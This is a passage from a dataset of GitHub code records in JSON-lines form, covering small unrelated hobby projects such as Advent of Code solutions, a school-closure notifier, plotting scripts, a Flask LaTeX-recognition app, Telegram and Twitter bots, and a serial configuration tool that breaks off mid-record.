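    if root.left is None and root.right is None:
        return acc  # leaf: acc now encodes one complete path
    return sum_root_to_leaf(root.left, acc) + sum_root_to_leaf(root.right, acc)

# Paths 100, 101 and 11 give 4 + 5 + 3 = 12.
root = TreeNode(1)
root.left, root.right = TreeNode(0), TreeNode(1)
root.left.left, root.left.right = TreeNode(0), TreeNode(1)
print(sum_root_to_leaf(root))  # 12

Carrying the accumulator down the recursion avoids materialising the path lists, so extra memory stays proportional to the tree height rather than to the number of leaves.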
+{"seq_id":"28852460464","text":"#!/usr/bin/env python3\n\n\nwith open(\"./input.txt\", \"r\") as content:\n #For each line of the text file, strip the newline character, convert to integer, save to a list array\n lines = [line.rstrip('\\n') for line in content.readlines()]\n\n forwardList = []\n upList = []\n downList = []\n\n for line in lines:\n if \"forward\" in line:\n for chars in line:\n if chars.isdigit():\n forwardList.append(int(chars))\n\n if \"up\" in line:\n for chars in line:\n if chars.isdigit():\n upList.append(int(chars))\n \n if \"down\" in line:\n for chars in line:\n if chars.isdigit():\n downList.append(int(chars))\n\n forwardSum = sum(forwardList)\n upSum = sum(upList)\n downSum = sum(downList)\n\n height = (downSum - upSum) \n\n ans = (height * forwardSum)\n print(\"Part One Answer: \", ans)\n\n\n\n\n #---------------Part TWO-------------------\n\n \n horz = 0\n depth = 0\n aim = 0\n\n #Iterate Through List\n for line in lines:\n #If line contains forward, extract integer, add it to Horizontal, multiply current element integer by current aim and add it to Depth\n if \"forward\" in line:\n for chars in line:\n if chars.isdigit():\n horz += int(chars)\n depth += (aim * int(chars))\n\n #If Line contains up, extract integer, decrease aim\n if \"up\" in line:\n for chars in line:\n if chars.isdigit():\n aim -= int(chars)\n\n #If Line contains up, extract integer, increase aim\n if \"down\" in line:\n for chars in line:\n if chars.isdigit():\n aim += int(chars)\n\n\n#Multiply Depth by Horizontal\nprint(\"Part two answer: \", (depth*horz))\n","repo_name":"MikeAA97/AdventOfCode2021","sub_path":"Day2/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23312978545","text":"import os\nimport datetime\nimport time\n\nfrom notifier import *\nfrom source import *\n\n\nif __name__ == '__main__':\n sources = [FCPSSource(), TwitterSource(\"fcpsnews\", r'all +schools.+will +(.+)on +(.+)'), TwitterSource(\"RyanLMcElveen\", r'FCPS.*will(.+)(?:on|tomorrow|today)(.+)')]\n notifiers = [IRCNotifier((\"chat.freenode.net\",6667), \"fcpsbot\", [\"#fcpsbot\", \"#tjhsst\"], [\"sdamashek\", \"jwoglom\", \"fwilson\"]), TextNotifier([\"+15713582032\"])]\n\n if os.name == 'nt':\n notifiers.append(WindowsNotifier())\n\n for source in sources:\n source.poll()\n\n while True:\n for source in sources:\n if source.event != source.old_event:\n source.old_event = source.event\n delta = source.event.date - datetime.datetime.today()\n if delta.days >= 0:\n for n in notifiers:\n n.notify(source.event)\n time.sleep(1)","repo_name":"sdamashek/schoolbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"19744376015","text":"import numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nfilename = '10.1e9y0.0152m.txt'\niDF = pd.read_table(filename, header=13, skipfooter=2, engine='python', delim_whitespace=True)\n\nprint(iDF.axes)\n\n\n# Plot HR-diagram\nplt.figure(dpi=300)\nplt.plot(10 ** iDF['logTe'], iDF['logL'], '.k')\nplt.title(filename[:-4])\nplt.grid()\nplt.xlim(7000,2000)\nplt.xlabel('Effective temperature')\nplt.ylabel('Log L/L_sun')\n# Sun properties\nplt.axvline(5772, ymin=0, ymax=1, linestyle='--', color='r')\nplt.axhline(0, xmin=0, xmax=1, linestyle='--', color='r')\n# Testing for exact values\n#plt.axvline(8050, 
ymin=0, ymax=1, linestyle='--', color='b')\n#plt.axhline(0.82, xmin=0, xmax=1, linestyle='--', color='b')\nplt.show()\n\n","repo_name":"kr4ften/astro_1_bonus","sub_path":"plotHR.py","file_name":"plotHR.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40424598429","text":"from PyQt4 import QtCore, QtGui\n\nfrom library.Completer import CStaticCompleterModel, CCompleter\nfrom library.LineEdit import CLineEdit\n\n\nclass CPolicySerialEdit(CLineEdit):\n seriesList = None\n\n @staticmethod\n def getSeriesList():\n if CPolicySerialEdit.seriesList is None:\n db = QtGui.qApp.db\n result = []\n try:\n query = db.query('SELECT DISTINCT serial FROM Organisation_PolicySerial WHERE serial != \\'\\' ORDER BY serial')\n while query.next():\n result.append(query.value(0))\n except:\n pass\n CPolicySerialEdit.seriesList = result\n return CPolicySerialEdit.seriesList\n\n\n def __init__(self, parent=None):\n super(CPolicySerialEdit, self).__init__(parent)\n self.__completerModel = CStaticCompleterModel(self, self.getSeriesList())\n self.__completer = CCompleter(self, self.__completerModel)\n self.setCompleter(self.__completer)\n self.connect(self.__completer, QtCore.SIGNAL('highlighted(QString)'), self.onCompleterHighlighted)\n\n\n def focusOutEvent(self, event):\n currentCompletion = self.__completer.currentCompletion()\n if QtCore.QString.compare(self.text(), currentCompletion, QtCore.Qt.CaseInsensitive) == 0:\n self.setText(currentCompletion)\n# self.setInsurerFilter(currentCompletion)\n super(CPolicySerialEdit, self).focusOutEvent(event)\n\n# def setInsurerFilter(self, text):\n# pass\n\n def onCompleterHighlighted(self, text):\n self.emit(QtCore.SIGNAL('textEdited(QString)'), text)\n","repo_name":"dio4/vista_1","sub_path":"Registry/PolicySerialEdit.py","file_name":"PolicySerialEdit.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15565049508","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2018-01-20 14:28:18\n# @Author : anxi.xue (xueanxi@163.com)\n# @Version : $Id$\n\nimport os\nimport platform\nimport logging\n\n# 获得当前文件的路径\ncurrentFilePath = os.getcwd()\nprint('currentFilePath is ', currentFilePath)\n# 获得当前文件的父路径\nparentPath = os.path.abspath(os.path.dirname(currentFilePath) + os.sep + '.')\nprint('parentPaht = ', parentPath)\n# 获得当前文件的父路径的父路径\nparentPath2 = os.path.abspath(os.path.dirname(currentFilePath) + os.sep + '..')\nprint('parentPath2 = ', parentPath2)\n# 三个点,不是三重父路径,而是和一个点一样\nparentPath3 = os.path.abspath(\n os.path.dirname(currentFilePath) + os.sep + '...')\nprint('parentPath3 = ', parentPath3)\n\n# 创建log路径\nlogfileName = 'log.txt'\nlogFolderNme = 'log'\nlogFolderPath = os.path.join(currentFilePath, logFolderNme)\nprint('logfolder path:', logFolderPath)\nif os.path.exists(logFolderPath):\n print('log folder is exist, not should create.')\nelse:\n print('create log folder...')\n os.mkdir(logFolderPath)\n\n# 指定Log文件\n# os.path.join()方法可以把你输入的路径拼成当前操作系统可用的路径\nlogfilePath = os.path.join(currentFilePath, logFolderNme, logfileName)\nprint('log file: ', logfilePath)\n\n# 配置log信息\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s : %(levelname)s : %(message)s',\n filename=logfilePath,\n filemode='a') # a是追加模式,w是写入\n\nlogging.debug('start logging ...')\nlogging.warning('logging warning ...')\nlogging.error('logging error 
...')\n","repo_name":"xueanxi/learnAi","sub_path":"test/37_logging.py","file_name":"37_logging.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38399292093","text":"from itertools import permutations\n\nT = int(input())\n\n\ndef permutation(idx, total):\n global ans # idx == N 되어 해당 순열의 합 계산할 때, ans보다 작으면 갱신해줘야 하므로 global 활용\n\n if idx == N: # 순열 완성\n if total < ans:\n ans = total\n return\n\n if total >= ans:\n return\n\n for i in range(N):\n if check[i] == 0:\n sel[idx] = i\n check[i] = 1\n # total += data[idx][sel[idx]] 함수에서 더하면 아래서 빼주지 않아도 됨\n permutation(idx + 1, total + data[idx][sel[idx]])\n # total -= data[idx][sel[idx]]\n check[i] = 0\n\n\nfor tc in range(1, T + 1):\n N = int(input())\n data = [list(map(int, input().split())) for _ in range(N)]\n\n ans = 10 * N # 각 숫자가 10 미만 자연수이므로 무조건 10*N보다 작음\n\n for_permutation = list(range(N))\n sel = [0] * N # 순열을 만들어줄 리스트. sel[idx]는 data[idx]의 column 인덱스\n check = [0] * N # 현재 순열에 들어가있는 숫자 체크 위한 리스트\n\n permutation(0, 0)\n\n # for permutation in permutations(for_permutation, N):\n # temp = 0\n # for i in range(N):\n # temp += data[i][permutation[i]]\n # if temp >= ans:\n # break\n # if temp < ans:\n # ans = temp\n\n print(\"#{} {}\".format(tc, ans))\n","repo_name":"LeeSungRyul/TIL","sub_path":"Algorithm/SWEA/D2/4881_d2_배열최소합.py","file_name":"4881_d2_배열최소합.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4877762945","text":"import time\nimport credentials\nimport tweepy\nimport random\nimport requests\nimport shutil\nfrom tweepy import OAuthHandler\nimport os\nauth = OAuthHandler(credentials.consumer_key, credentials.consumer_secret)\nauth.set_access_token(credentials.access_token, credentials.access_token_secret)\napi = tweepy.API(auth)\n\ndef imageTweet():\n #carpeta con imagenes\n carpeta = 'images/'\n #lista de imagenes\n imagenes = [f for f in os.listdir(carpeta) if os.path.isfile(os.path.join(carpeta, f))]\n #seleccionar una imagen aleatoria\n imagen = random.choice(imagenes)\n #ruta de la imagen\n ruta = carpeta + imagen\n #tweet con la imagen\n print(\"Enviando tweet con imagen... ⏰\")\n time.sleep(3)\n api.update_with_media(ruta)\n print(\"Tweet con imagen enviado con éxito ✅\")\n time.sleep(3)\n #borrar imagen?\n print(\"Borrar imagen? (s/n)\")\n rta = input()\n if rta == \"s\":\n print(\"Borrando imagen... ⏳\")\n time.sleep(3)\n os.remove(ruta)\n print(\"Imagen borrada 🚮\")\n time.sleep(3)\n return\n else:\n print(\"Imagen no borrada 😁\")\n return\n ","repo_name":"YasarChavez/Bot-Twitter","sub_path":"imageTweet.py","file_name":"imageTweet.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26612088650","text":"'''\nAuthor: Aadil Hussain\nBuilt on: Python 3.10.8\n'''\nimport random\n\n# For Homework to complete for tomrrow:\n# Bootcamp P2: 054,071,073,075\n\n# 054\nuser_sel = input(\"pick heads or tails[H or T]: \").lower()\nif user_sel == random.choice([\"h\", \"t\"]):\n print(\"You win!\")\nelse:\n print(f\"Sorry you lose! 
The computer chose {random.choice(['heads', 'tails'])}\")\n\n# 071\nsports = [\"baseball\", \"basketball\"]\nsports.append(input(\"what is your fav sport?: \").lower())\nsports.sort(); print(sports)\n\n# 073\nfav_foods = {}\nfor i in range(3):\n fav_foods[i] = input(f\"enter favorite food {i}: \")\nprint(fav_foods)\nfav_foods.pop(input(\"which number do you want to remove?: \"))\nprint(fav_foods)\n\n# 075\nrand_nums = []\nfor i in range(3):\n rand_nums.append(random.randint(100, 999))\nfor item in rand_nums:\n print(item)\ntry:\n rand_nums.index(int(input(\"enter a three-digit number\")))\nexcept ValueError:\n print(\"That is not on the list\")\n","repo_name":"Aulteran/Course-ICS4U-Notes","sub_path":"Unit 1 Bootcamp Assignments/P2_054_071_073_075.py","file_name":"P2_054_071_073_075.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74577139448","text":"from copy import deepcopy\n\nfrom matplotlib import pyplot as plt\nimport csv\nimport numpy as np\n\ndataset = 2\n\n# 结构体定义\nclass Metrics:\n fusion_node_name: str\n gpu_limit: int\n cpu_limit: int\n max_cpu_usage: int\n avg_latency: float\n pass\n\n\n# let error data in box plot also be considered inside the quarter\ndef adjust_dataset(data):\n # 找到每个数据集的上下四分位和异常值\n new_data = []\n outliers = [[] for _ in range(len(data))]\n\n for i, dataset in enumerate(data):\n Q1 = np.percentile(dataset, 25)\n Q3 = np.percentile(dataset, 75)\n IQR = Q3 - Q1\n\n lower_bound = Q1 - 1.5 * IQR\n upper_bound = Q3 + 1.5 * IQR\n\n # 确定异常值\n outliers[i] = [value for value in dataset if value < lower_bound or value > upper_bound]\n # 结合原始数据和异常值\n combined_data = np.concatenate((dataset, outliers[i]))\n\n new_data.append(combined_data)\n return new_data\n\n\ndef get_confidence_interval(data, confidence=0.95):\n from scipy.stats import sem, t\n means, confidence_intervals = [], []\n for dataset in data:\n mean = np.mean(dataset)\n std_err = sem(dataset)\n ci_range = std_err * t.ppf((1 + confidence) / 2, len(dataset) - 1)\n\n means.append(mean)\n confidence_intervals.append(ci_range)\n return confidence_intervals\n\n\ndef getLatency(node_name, gpu_limit, cpu_limit, exclude_first=True):\n with open(\n 'D:\\学术资料\\硕士\\CS 7638 AI Techniques for Robotics\\Project\\RL_Introduction\\MetricsAnalyse\\data\\CompleteTask'\n '\\detail_metrics\\\\full_task\\\\{0}\\latencies_{1}_{2}_{3}.csv'\n .format(dataset, node_name, gpu_limit, cpu_limit),\n 'r') as file:\n\n in_latencies = []\n if exclude_first:\n file.readline()\n while True:\n num = file.readline()\n if num == \"\":\n break\n in_latencies.append(float(num))\n return in_latencies\n\n\ncpu_limits = {\n \"as1\": list(range(400, 3200, 200)),\n \"controller\": list(range(1000, 5200, 200))\n}\ngpu_limits = [33, 50, 100]\ntotal_medians = []\ntotal_confidences = []\nlatencies = {\n \"as1\": [],\n \"controller\": []\n}\nlatencies_map = {\n 33: deepcopy(latencies),\n 50: deepcopy(latencies),\n 100: deepcopy(latencies)\n}\nfor fusion_node in cpu_limits.keys():\n for gpu_limit in gpu_limits:\n for cpu_limit in cpu_limits[fusion_node]:\n latencies_map[gpu_limit][fusion_node].append(getLatency(fusion_node, gpu_limit, cpu_limit))\nmedians = {\n \"as1\": [],\n \"controller\": [],\n}\n\nmedians_map = {\n 33: deepcopy(medians),\n 50: deepcopy(medians),\n 100: deepcopy(medians)\n}\n\nfor fusion_node in cpu_limits.keys():\n for gpu_limit in gpu_limits:\n for i, cpu_limit in enumerate(cpu_limits[fusion_node]):\n 
medians_map[gpu_limit][fusion_node].append(np.median(latencies_map[gpu_limit][fusion_node][i]))\n\nconfidence = {\n \"as1\": [],\n \"controller\": [],\n}\n\nconfidence_map = {\n 33: deepcopy(medians),\n 50: deepcopy(medians),\n 100: deepcopy(medians)\n}\n\nfor fusion_node in cpu_limits.keys():\n for gpu_limit in gpu_limits:\n for i, cpu_limit in enumerate(cpu_limits[fusion_node]):\n confidence_map[gpu_limit][fusion_node].append(\n get_confidence_interval([latencies_map[gpu_limit][fusion_node][i]])[0])\n\nfor gpu_limit in gpu_limits:\n for fusion_node in cpu_limits.keys():\n print(cpu_limits[fusion_node])\n print(medians_map[gpu_limit][fusion_node])\n plt.plot(cpu_limits[fusion_node], medians_map[gpu_limit][fusion_node], label=fusion_node)\n plt.errorbar(cpu_limits[fusion_node], medians_map[gpu_limit][fusion_node],\n yerr=confidence_map[gpu_limit][fusion_node], fmt='o', capsize=5, capthick=1,\n ms=2, label=fusion_node)\n plt.title(\"GPU limit is \" + str(gpu_limit))\n plt.legend()\n plt.show()\n plt.close()\n","repo_name":"MChen2333/k8s-based-resource-management-platform","sub_path":"MetricsAnalysis/compare_node.py","file_name":"compare_node.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72744373690","text":"#import io\n#import io\nfrom skimage import io\nimport json\n#import os\n#\n#os.environ['KMP_DUPLICATE_LIB_OK']='True'\n\nfrom torchvision import models\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom flask import Flask, jsonify, request, Response\nfrom resnet_custom import *\nfrom image2latex_model import Image2LatexModel\nfrom data_management import *\nfrom render import *\nimport numpy as np\nfrom cv2 import IMREAD_COLOR, imdecode\n\n#from pdflatex import PDFLaTeX\n\n\napp = Flask(__name__)\nstring_numerizer = StringNumerizer('latex_vocab.txt')\nmodel = Image2LatexModel(index2word=string_numerizer.idx2sym,\n word2index=string_numerizer.sym2idx,\n use_transformer_encoder=False)\nmodel.eval()\n\nmodel_info = torch.load(\"epoch_4_no_transenc.pth\", map_location=torch.device('cpu'))\nmodel.load_state_dict(model_info)\n\ndef transform_image(image):\n input_transforms = [transforms.ToTensor()]\n my_transforms = transforms.Compose(input_transforms)\n# image = Image.open(file) # Open the image file\n# image = img\n image = image.transpose((2, 0, 1))\n timg = torch.FloatTensor(image) # Transform PIL image to appropriately-shaped PyTorch tensor\n \n timg.unsqueeze_(0)\n return timg\n\n\ndef get_prediction(file):\n tensor = transform_image(file)\n# print(tensor)\n return model.predict(tensor)\n \ndef root_dir(): # pragma: no cover\n return os.path.abspath(os.path.dirname(__file__))\n\ndef get_file(filename): # pragma: no cover\n try:\n src = os.path.join(root_dir(), filename)\n # Figure out how flask returns static files\n # Tried:\n # - render_template\n # - send_file\n # This should not be so non-obvious\n return open(src).read()\n except IOError as exc:\n return str(exc)\n \n@app.route('/predict', methods=['POST'])\ndef predict():\n# print(request.data)\n# print(request.files['image'].read())\n \n \n# if request.method == 'POST':\n# file = request.files['file']\n file = request.files['image'].read()\n npimg = np.frombuffer(file, np.uint8)\n img=imdecode(npimg,IMREAD_COLOR)\n# print(img)\n \n labels = get_prediction(img)\n labels.squeeze_()\n# print(labels)\n markup = get_latex(labels.numpy())\n print(markup)\n# get_picture(markup)\n return 
jsonify({'markup':markup})\n\n\n@app.route('/testing', methods=['GET'])\ndef sauce():\n if request.method == 'GET':\n return jsonify({'markup':'hi'})\n@app.route('/')\ndef hello():\n content = get_file('test.html')\n return Response(content, mimetype=\"text/html\")\n# return \"hello worlds\"\nif __name__ == '__main__':\n app.run()\n","repo_name":"tejasvikothapalli/latex2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32873031368","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n \"\"\"\n Given a string input, s, the function returns the length of the \n longest substring within s.\n \"\"\"\n\n # Check for constraints\n if len(s) > 5e4:\n return -1\n\n # We will store the largest length substring with distinct\n # characters in this variable and return it in the end\n largest_substring_length = 0\n\n # We loop over the length of the string\n for i in range(len(s)):\n\n # The length will denote the length of the current substring \n # being counted. \n length = 0\n\n # The distinct characters will be stored and checked with the \n # list, distinct_chars. We will use the boolean distinct to help \n # us loop over each of the substrings until we detect a duplicate\n # character\n distinct_chars = []\n distinct = True\n\n # We loop over each substring with help of the variable, j, which\n # starts at the ith position\n j = i\n\n # While the characters being encountered are still distinct and\n # we are not going past the end of the string, s, we check if the\n # current character has been seen and append it to\n # distinct_chars if not. We increase the size of length by one. \n while distinct and j <= len(s)-1:\n \n if s[j] not in distinct_chars:\n \n distinct_chars.append(s[j])\n length += 1\n\n # If we encounter a duplicate character, then if the size of \n # length is larger than the global largest_substring_length \n # variable, then we redefine largest_substring_length to length.\n else:\n \n if length > largest_substring_length:\n largest_substring_length = length\n \n distinct = False\n\n j+=1\n \n # If it has reached the end without encountering a duplicate,\n # we must set largest_substring_length to length\n if length > largest_substring_length:\n largest_substring_length = length\n\n \n return largest_substring_length\n\nsol = Solution()\nprint(sol.lengthOfLongestSubstring('abcabcbb'))\nprint(sol.lengthOfLongestSubstring('bbbbb'))\nprint(sol.lengthOfLongestSubstring('pwwkew'))\nprint(sol.lengthOfLongestSubstring('au'))\nprint(sol.lengthOfLongestSubstring(''))\nprint(sol.lengthOfLongestSubstring(' '))","repo_name":"metalphase/small_code","sub_path":"longest_substring_without_repeats.py","file_name":"longest_substring_without_repeats.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15462278055","text":"from turtle import Turtle\nimport random\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nMAX_CARS = 30\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n\n def __init__(self):\n self.cars = []\n self.speed = STARTING_MOVE_DISTANCE\n self.rate = 1.0\n\n def decide_cars(self):\n if len(self.cars) >= MAX_CARS:\n return\n make_decide = random.randint(1, 10)\n if make_decide <= int(self.rate):\n rand_y = random.randint(-250, 280)\n while not 
self.is_clear(rand_y):\n rand_y = random.randint(-250, 280)\n self.make_car(rand_y)\n\n def make_car(self, ycor):\n new_car = Turtle('square')\n new_car.shapesize(stretch_len=2)\n new_car.color(random.choice(COLORS))\n new_car.penup()\n new_car.goto(280, ycor)\n new_car.setheading(180)\n self.cars.append(new_car)\n\n def move_cars(self):\n for i in range(len(self.cars) - 1, -1, -1):\n car = self.cars[i]\n if car.xcor() < -300:\n car.hideturtle()\n self.cars.remove(car)\n else:\n car.forward(self.speed)\n\n def inc_speed(self):\n self.speed += MOVE_INCREMENT\n self.rate = self.rate + 1\n\n def is_clear(self, y_pos, check_player=False):\n x_pos = 260\n if check_player:\n x_pos = 0\n for car in self.cars:\n if car.ycor() - 10 < y_pos < car.ycor() + 10 and car.xcor() - 20 < x_pos < car.xcor() + 20:\n return False\n return True\n","repo_name":"jgregory39/100DoC-Python","sub_path":"Day-23-Turtle-Crossing/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34977162748","text":"\"\"\"Testapi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom apiMang import views\nfrom django.conf.urls import url\nfrom django.conf.urls import url, include\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n url(r'^index/$', views.index),\n url(r'^login_action/$', views.login_action),\n url(r'^api_manage/$', views.api_manage),\n url(r'^accounts/login/$', views.index),\n url(r'^search_name/$', views.search_name),\n url(r'^project_manage/$', views.project_manage),\n url(r'^report_manage/$', views.report_manage),\n url(r'^logout/$', views.logout),\n url(r'^api/', include('apiMang.urls', namespace=\"apiMang\")),\n]\n","repo_name":"chenwei481/TestSquid","sub_path":"Testapi/Testapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"46946828853","text":"import time\nimport asyncio\nimport logging\n\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\nfrom pymongo.errors import ConnectionFailure\nfrom logging.handlers import RotatingFileHandler\n\n\nfrom better import Better, db_core\nfrom better.config import *\nfrom better.helpers.scheduler import scheduling_anime, scheduling_day_animes\n\nfrom pyrogram import idle\n\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"[%(asctime)s - %(levelname)s] - %(name)s - %(message)s\",\n datefmt=\"%d-%b-%y %H:%M:%S\",\n handlers=[\n RotatingFileHandler(\"better.log\", maxBytes=20480, backupCount=10),\n logging.StreamHandler(),\n 
],\n)\n\n\nlogging.getLogger(\"apscheduler.executors.default\").disabled\n\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\nlogging.getLogger(\"pyrogram.parser.html\").setLevel(logging.ERROR)\nlogging.getLogger(\"pyrogram.session.session\").setLevel(logging.ERROR)\n\n\nscheduler = AsyncIOScheduler(timezone=\"America/Sao_Paulo\")\nstart_time = time.time()\n\n\nasync def db_connect():\n \"\"\"Check Mongo Client\"\"\"\n try:\n logging.info(\"Conectando ao MongoDB\")\n await db_core.server_info()\n logging.info(\"Database conectada\")\n except (BaseException, ConnectionFailure) as e:\n logging.error(\"Falha ao conectar a database, saindo....\")\n logging.error(str(e))\n quit(1)\n\n\nasync def run_better():\n \"\"\"Start Bot\"\"\"\n try:\n await Better.start()\n except Exception as e:\n logging.error(e)\n await Better.send_message(\n chat_id=GP_LOGS, text=f\"[ Better Schedule ] Bot iniciado com sucesso ...\\nVersion: {VERSION}\"\n )\n logging.info(\"[ Better Schedule ] Bot iniciado com sucesso ...\\n\")\n\n\nasync def main():\n await db_connect()\n await run_better()\n scheduler.add_job(scheduling_day_animes, \"cron\", hour=11, id=\"beter_anime_day\")\n scheduler.add_job(scheduling_anime, \"interval\", minutes=1, id=\"better_scheduller\")\n scheduler.start()\n await idle()\n\n\nif __name__ == \"__main__\":\n asyncio.get_event_loop().run_until_complete(main())\n","repo_name":"KuuhakuTeam/BetterBot","sub_path":"better/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8810061389","text":"from mimain import install_and_load\ntry:\n import tinydb;\nexcept:\n tinydb = install_and_load('tinydb')\n\ndb = tinydb.TinyDB(\"segatest.json\")\n\ndef insertar_usuario(usuario):\n try:\n usuario[\"usuario\"] = usuario[\"usuario\"].trim().lower()\n db.insert(usuario)\n return \"OK\"\n except Exception as e:\n return str(e)\n\ndef listar():\n return db.all()\n\ndef logearse(usuario1, pwd1):\n try:\n login = tinydb.Query()\n return db.search((login[\"usuario\"] == usuario1) & (login[\"pwd\"] == pwd1))\n except Exception as e:\n return {\"code\": 500, \"errormsg\": str(e)}\n\ndef actualizar(usuario1, llave_usuario):\n try:\n login = tinydb.Query()\n db.update(usuario1, login[\"usuario\"] == llave_usuario)\n return \"OK\"\n except Exception as e:\n return {\"code\": 500, \"errormsg\": str(e)}\n\ndef obtener_usuario(usuario1):\n return db.search(tinydb.Query()[\"usuario\"] == usuario1)","repo_name":"alejandro-zapeta/test1python","sub_path":"miapp.py","file_name":"miapp.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42712125940","text":"#!/usr/bin/python3\n\nimport json\nimport yaml\nimport copy\nimport struct\nimport sys\nimport serial\nfrom enum import Enum\n\nclass TypeError(Exception): pass\nclass WidthError(Exception): pass\nclass RangeError(Exception): pass\nclass MapError(Exception): pass\nclass FixedValueError(Exception): pass\nclass SerialError(Exception): pass\n\nclass DataType(Enum):\n Char = 1,\n Byte = 2,\n Short = 3,\n Integer = 4,\n Float = 5,\n Double = 6,\n Array = 7\n\n @classmethod\n def parse(self, str):\n if(str == 'char'):\n return DataType.Char\n if(str == 'byte'):\n return DataType.Byte\n if(str == 'short'):\n return DataType.Short\n if(str == 'integer'):\n return DataType.Integer\n if(str == 'float'):\n return DataType.Float\n if(str == 
'double'):\n return DataType.Double\n if(str == 'array'):\n return DataType.Array\n\n return None\n\nclass Constraint(Enum):\n Fixed = 1,\n Range = 2,\n Map = 3,\n\n @classmethod\n def parse(self, str):\n if(str == 'fixed'):\n return Constraint.Fixed\n if(str == 'range'):\n return Constraint.Range\n if(str == 'map'):\n return Constraint.Map\n\n return None\n\n\nENQ = b'\\x05'\nACK = b'\\x06'\nRESET = b'\\x00'\n\nclass Item:\n def __init__(self, name):\n # SCHEMA properties\n self.name = name\n self.dataType = None\n self.position = None\n self.width = None\n self.description = None\n self.defaultValue = None\n self.constraint = None\n self.policy = None\n # range constraint\n self.minValue = None\n self.maxValue = None\n # map constraint\n self.map = []\n # CONFIGURATION properties\n self.value = None\n\n def checkConstraint(self, value):\n if (self.constraint == Constraint.Range):\n if (value <= self.maxValue and value >= self.minValue):\n return True\n else:\n raise RangeError(\"Constraint error: value range\")\n elif (self.constraint == Constraint.Map):\n if (next((entry for entry in self.map if entry['value'] == value), False)):\n return True\n else:\n raise MapError(\"Constraint error: value not present in map\")\n if (type(value) == str):\n if (len(value) <= self.width):\n return True\n else:\n raise WidthError(\"Constraint error: width\")\n elif (self.constraint == Constraint.Fixed):\n raise FixedError(\"Constraint error: fixed value\") \n\n return False\n\n def assignValue(self, value):\n if (type(value) == int and (self.dataType == DataType.Short \\\n or self.dataType == DataType.Byte or self.dataType == DataType.Integer)):\n if self.checkConstraint(value):\n self.value = value\n return True\n elif (type(value) == float and (self.dataType == DataType.Float \\\n or self.dataType == DataType.Double)):\n if self.checkConstraint(value):\n self.value = value\n return True\n elif (type(value) == str and self.dataType == DataType.Char):\n if self.checkConstraint(value):\n self.value = value\n return True\n elif (type(value) == list and self.dataType == DataType.Array):\n if (len(value) != self.width):\n raise WidthError(\"Wrong array width\")\n return False\n for elem in value:\n if (self.checkConstraint(elem) == False):\n return False\n self.value = value\n return True\n # user can specify a map value with a 'tag' instead of value...\n elif (type(value) == str and self.dataType == DataType.Byte):\n for entry in self.map:\n if (\"tag\" in entry and entry['tag'] == value):\n self.value = entry['value']\n return True\n \n return False\n\n def __repr__(self):\n rep = ' Item\\n'\n rep += f' name: {self.name}\\n'\n rep += f' dataType: {self.dataType}\\n'\n rep += f' position: {self.position}\\n'\n rep += f' width: {self.width}\\n'\n rep += f' description: {self.description}\\n'\n if (self.defaultValue != None):\n rep += f' defaultValue: 